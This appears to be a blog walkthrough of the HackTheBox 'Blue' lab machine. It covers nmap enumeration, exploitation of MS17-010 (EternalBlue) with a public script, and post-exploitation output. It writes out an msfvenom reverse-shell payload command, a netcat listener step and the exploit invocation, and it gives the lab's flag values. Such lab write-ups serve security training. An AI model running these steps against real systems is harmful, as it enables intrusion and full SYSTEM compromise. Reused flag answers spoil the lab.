HackTheBox | Blue

HackTheBox | Blue

a month ago   •   5 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Sun Aug 14 19:46:21 2022 as: nmap -T5 -p- -oA scan -Pn 10.10.10.40
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.40
Host is up (0.017s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE    SERVICE
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
32021/tcp filtered unknown
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
49155/tcp open     unknown
49156/tcp open     unknown
49157/tcp open     unknown
60080/tcp filtered unknown

# Nmap done at Sun Aug 14 19:46:52 2022 -- 1 IP address (1 host up) scanned in 30.51 seconds





Service Enumeration

TCP/139,445

nmap OS detection identifies this host as Microsoft Windows Server 2008 SP1 , while the SMB headers say the host is Windows 7 Professional 7601 Service Pack 1. Either way, given the host operating system and unenforced SMB signing, this looks like a perfect candidate for MS17-010 (Eternal Blue); no coincidence given the name of the box.





Exploit

Search Google for public exploits on GitHub: site:github.com "ms17-010" . This repo should work perfectly for our target operating system.

GitHub - helviojunior/MS17-010: MS17-010
MS17-010. Contribute to helviojunior/MS17-010 development by creating an account on GitHub.

The send_and_execute.py exploit will allow us to generate a malicious binary, transfer it to the target, and execute via named pipe.

  1. git clone <repo url>
  2. cd MS17-010
  3. Edit send_and_execute.py and change USERNAME = ''  to USERNAME = ' ' (with a space), to allow anonymous authentication
  4. Generate a payload: msfvenom -p windows/shell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform windows -f exe -o pwn.exe
  5. Start a netcat listener on your specified port
  6. Run the exploit: python2 send_and_execute.py target-ip binary.exe





Post-Exploit Enumeration

Current User

Click to expand
whoami
    
nt authority\system



OS & Kernel

Click to expand
systeminfo

Host Name:                 HARIS-PC
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          haris
Registered Organization:   
Product ID:                00371-222-9819843-86066
Original Install Date:     14/07/2017, 14:45:30
System Boot Time:          15/08/2022, 01:49:12
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,576 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,546 MB
Virtual Memory: In Use:    549 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 178 Hotfix(s) Installed.
                           [01]: KB2849697
                           [02]: KB2849696
                           [03]: KB2841134
                           [04]: KB2670838
                           [05]: KB2479943
                           [06]: KB2491683
                           [07]: KB2506014
                           [08]: KB2506212
                           [09]: KB2506928
                           [10]: KB2509553
                           [11]: KB2533552
                           [12]: KB2534111
                           [13]: KB2545698
                           [14]: KB2547666
                           [15]: KB2552343
                           [16]: KB2560656
                           [17]: KB2563227
                           [18]: KB2564958
                           [19]: KB2579686
                           [20]: KB2603229
                           [21]: KB2604115
                           [22]: KB2620704
                           [23]: KB2621440
                           [24]: KB2631813
                           [25]: KB2639308
                           [26]: KB2640148
                           [27]: KB2654428
                           [28]: KB2660075
                           [29]: KB2667402
                           [30]: KB2685811
                           [31]: KB2685813
                           [32]: KB2690533
                           [33]: KB2698365
                           [34]: KB2705219
                           [35]: KB2719857
                           [36]: KB2726535
                           [37]: KB2727528
                           [38]: KB2729094
                           [39]: KB2732059
                           [40]: KB2732487
                           [41]: KB2736422
                           [42]: KB2742599
                           [43]: KB2750841
                           [44]: KB2761217
                           [45]: KB2763523
                           [46]: KB2770660
                           [47]: KB2773072
                           [48]: KB2786081
                           [49]: KB2791765
                           [50]: KB2799926
                           [51]: KB2800095
                           [52]: KB2807986
                           [53]: KB2808679
                           [54]: KB2813430
                           [55]: KB2834140
                           [56]: KB2840631
                           [57]: KB2843630
                           [58]: KB2847927
                           [59]: KB2852386
                           [60]: KB2853952
                           [61]: KB2861698
                           [62]: KB2862152
                           [63]: KB2862330
                           [64]: KB2862335
                           [65]: KB2864202
                           [66]: KB2868038
                           [67]: KB2868116
                           [68]: KB2871997
                           [69]: KB2884256
                           [70]: KB2891804
                           [71]: KB2892074
                           [72]: KB2893294
                           [73]: KB2893519
                           [74]: KB2894844
                           [75]: KB2908783
                           [76]: KB2911501
                           [77]: KB2912390
                           [78]: KB2918077
                           [79]: KB2919469
                           [80]: KB2929733
                           [81]: KB2931356
                           [82]: KB2937610
                           [83]: KB2943357
                           [84]: KB2952664
                           [85]: KB2966583
                           [86]: KB2968294
                           [87]: KB2970228
                           [88]: KB2972100
                           [89]: KB2973112
                           [90]: KB2973201
                           [91]: KB2973351
                           [92]: KB2977292
                           [93]: KB2978120
                           [94]: KB2978742
                           [95]: KB2984972
                           [96]: KB2985461
                           [97]: KB2991963
                           [98]: KB2992611
                           [99]: KB3003743
                           [100]: KB3004361
                           [101]: KB3004375
                           [102]: KB3006121
                           [103]: KB3006137
                           [104]: KB3010788
                           [105]: KB3011780
                           [106]: KB3013531
                           [107]: KB3019978
                           [108]: KB3020370
                           [109]: KB3021674
                           [110]: KB3021917
                           [111]: KB3022777
                           [112]: KB3023215
                           [113]: KB3030377
                           [114]: KB3035126
                           [115]: KB3037574
                           [116]: KB3042553
                           [117]: KB3045685
                           [118]: KB3046017
                           [119]: KB3046269
                           [120]: KB3054476
                           [121]: KB3055642
                           [122]: KB3059317
                           [123]: KB3060716
                           [124]: KB3067903
                           [125]: KB3068708
                           [126]: KB3071756
                           [127]: KB3072305
                           [128]: KB3074543
                           [129]: KB3075220
                           [130]: KB3078601
                           [131]: KB3078667
                           [132]: KB3080149
                           [133]: KB3084135
                           [134]: KB3086255
                           [135]: KB3092601
                           [136]: KB3092627
                           [137]: KB3093513
                           [138]: KB3097989
                           [139]: KB3101722
                           [140]: KB3107998
                           [141]: KB3108371
                           [142]: KB3108381
                           [143]: KB3108664
                           [144]: KB3109103
                           [145]: KB3109560
                           [146]: KB3110329
                           [147]: KB3121255
                           [148]: KB3122648
                           [149]: KB3124275
                           [150]: KB3126587
                           [151]: KB3127220
                           [152]: KB3133977
                           [153]: KB3137061
                           [154]: KB3138378
                           [155]: KB3138612
                           [156]: KB3138910
                           [157]: KB3139398
                           [158]: KB3139914
                           [159]: KB3140245
                           [160]: KB3147071
                           [161]: KB3150220
                           [162]: KB3155178
                           [163]: KB3156016
                           [164]: KB3156019
                           [165]: KB3159398
                           [166]: KB3161102
                           [167]: KB3161949
                           [168]: KB3161958
                           [169]: KB3170455
                           [170]: KB3170735
                           [171]: KB3172605
                           [172]: KB3177467
                           [173]: KB3179573
                           [174]: KB3181988
                           [175]: KB3184143
                           [176]: KB4014504
                           [177]: KB976902
                           [178]: KB982018
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.40
                                 [02]: fe80::6808:33f:815b:2d67
                                 [03]: dead:beef::e02a:2e51:2801:1436
                                 [04]: dead:beef::6808:33f:815b:2d67



Users

Click to expand
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    haris                    
The command completed with one or more errors.



Groups

Click to expand
Unable to enumerate due to system error



Network

Interfaces
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::6808:33f:815b:2d67
   Temporary IPv6 Address. . . . . . : dead:beef::e02a:2e51:2801:1436
   Link-local IPv6 Address . . . . . : fe80::6808:33f:815b:2d67%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:35eb%11
                                       10.10.10.2

Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . 


ARP Table
N/A


Routes
N/A


Open Ports
N/A


Ping Sweep
N/A



Processes

Click to expand
N/A



Scheduled Tasks

Click to expand
N/A





Privilege Escalation

Vulnerable service is running as the SYSTEM account, therefore code execution yields a reverse shell running at the highest integrity level.





Flags

C:\Users\haris\Desktop\user.txt
5ad820847258b5bb4bc46c50cf97a993


C:\Users\Administrator\desktop\root.txt
ee0913e6c608b2f7376db7652524495c

Spread the word

Keep reading